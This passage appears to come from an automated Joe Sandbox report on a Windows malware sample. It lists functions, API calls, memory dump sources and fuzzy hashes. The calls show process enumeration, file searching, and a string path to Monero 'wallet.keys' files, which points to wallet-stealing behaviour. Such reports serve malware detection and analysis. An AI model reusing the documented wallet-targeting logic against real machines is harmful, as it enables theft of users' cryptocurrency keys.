                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                    • String ID:
                    • API String ID: 3729781310-0
                    • Opcode ID: 8a2901f1ee831ebf57a5f70b07253192b9be48972c42035d88db43262ae85395
                    • Instruction ID: 25bb92711604dbebda29ddbc115ae0a589a50c20dc3bf3b10e607af69e74ac21
                    • Opcode Fuzzy Hash: 8a2901f1ee831ebf57a5f70b07253192b9be48972c42035d88db43262ae85395
                    • Instruction Fuzzy Hash: B9312F71E40208AFDF18DFD0CD49BEEB779FB44701F204559E50AAB288DB749A85CB52
                    Function 00648680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006505B7), ref: 006486CA
                    • Process32First.KERNEL32(?,00000128), ref: 006486DE
                    • Process32Next.KERNEL32(?,00000128), ref: 006486F3
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                    • CloseHandle.KERNEL32(?), ref: 00648761
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                    • String ID:
                    • API String ID: 1066202413-0
                    • Opcode ID: 657adb20da4a0a9f5d2f3ad332848ba7e930ca8cf39f3b066848c0876b1558d8
                    • Instruction ID: 070480f9126f1f684258da8023bb9b1443f6021f2b86b5576a055c8144a5b231
                    • Opcode Fuzzy Hash: 657adb20da4a0a9f5d2f3ad332848ba7e930ca8cf39f3b066848c0876b1558d8
                    • Instruction Fuzzy Hash: 5B314D71941218AFDB68DF94CC55FEEB77AFB45700F10419DE50AA21A0DB306A85CFA1
                    Function 00647980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00650E00,00000000,?), ref: 006479B0
                    • RtlAllocateHeap.NTDLL(00000000), ref: 006479B7
                    • GetLocalTime.KERNEL32(?,?,?,?,?,00650E00,00000000,?), ref: 006479C4
                    • wsprintfA.USER32 ref: 006479F3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                    • String ID:
                    • API String ID: 377395780-0
                    • Opcode ID: 814e500ac271a7a597c3050c96dcedac6177065febab67ea77c03afcfdc8acd1
                    • Instruction ID: 2ee3cb7d15c77bead6fa3e51ebe63f9c9c309de41a184d8b9191695e9922d58a
                    • Opcode Fuzzy Hash: 814e500ac271a7a597c3050c96dcedac6177065febab67ea77c03afcfdc8acd1
                    • Instruction Fuzzy Hash: 01112AB2904118ABCB14DFC9DD49BBEB7F8FB4CB11F14425AF605A2284D3399940C7B1
                    Function 0064C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __getptd.LIBCMT ref: 0064C74E
                      • Part of subcall function 0064BF9F: __amsg_exit.LIBCMT ref: 0064BFAF
                    • __getptd.LIBCMT ref: 0064C765
                    • __amsg_exit.LIBCMT ref: 0064C773
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0064C797
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                    • String ID:
                    • API String ID: 300741435-0
                    • Opcode ID: 1d5e5036a494fca952dd94781e83edbf032287b25de9267c21858ed25c959c15
                    • Instruction ID: e5bd4720d9e0f2d5c9c8a1779706a5d2a1863c881f69a4e894d94bc2e96830f1
                    • Opcode Fuzzy Hash: 1d5e5036a494fca952dd94781e83edbf032287b25de9267c21858ed25c959c15
                    • Instruction Fuzzy Hash: 71F09A32942700ABD7E0BFB89806B9E33A3AF00732F21614DF404A63D2DB6499419E5E
                    Function 00644F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00648DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00648E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00644F7A
                    • lstrcat.KERNEL32(?,00651070), ref: 00644F97
                    • lstrcat.KERNEL32(?,01449D28), ref: 00644FAB
                    • lstrcat.KERNEL32(?,00651074), ref: 00644FBD
                      • Part of subcall function 00644910: wsprintfA.USER32 ref: 0064492C
                      • Part of subcall function 00644910: FindFirstFileA.KERNEL32(?,?), ref: 00644943
                      • Part of subcall function 00644910: StrCmpCA.SHLWAPI(?,00650FDC), ref: 00644971
                      • Part of subcall function 00644910: StrCmpCA.SHLWAPI(?,00650FE0), ref: 00644987
                      • Part of subcall function 00644910: FindNextFileA.KERNEL32(000000FF,?), ref: 00644B7D
                      • Part of subcall function 00644910: FindClose.KERNEL32(000000FF), ref: 00644B92
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                    • String ID:
                    • API String ID: 2667927680-0
                    • Opcode ID: 7a376026027c5e75b124684f3306826b0c67700087dc973ddc443c93f9c082b9
                    • Instruction ID: a8d4f5d0ed1e8d0d846e7d1ea56a9a7787d271a94801fac0d88bb38452f3c452
                    • Opcode Fuzzy Hash: 7a376026027c5e75b124684f3306826b0c67700087dc973ddc443c93f9c082b9
                    • Instruction Fuzzy Hash: 0E219BB69002046BD794FBB0DC4AEED333EBB95301F004558B65D97185EE74DAC88B97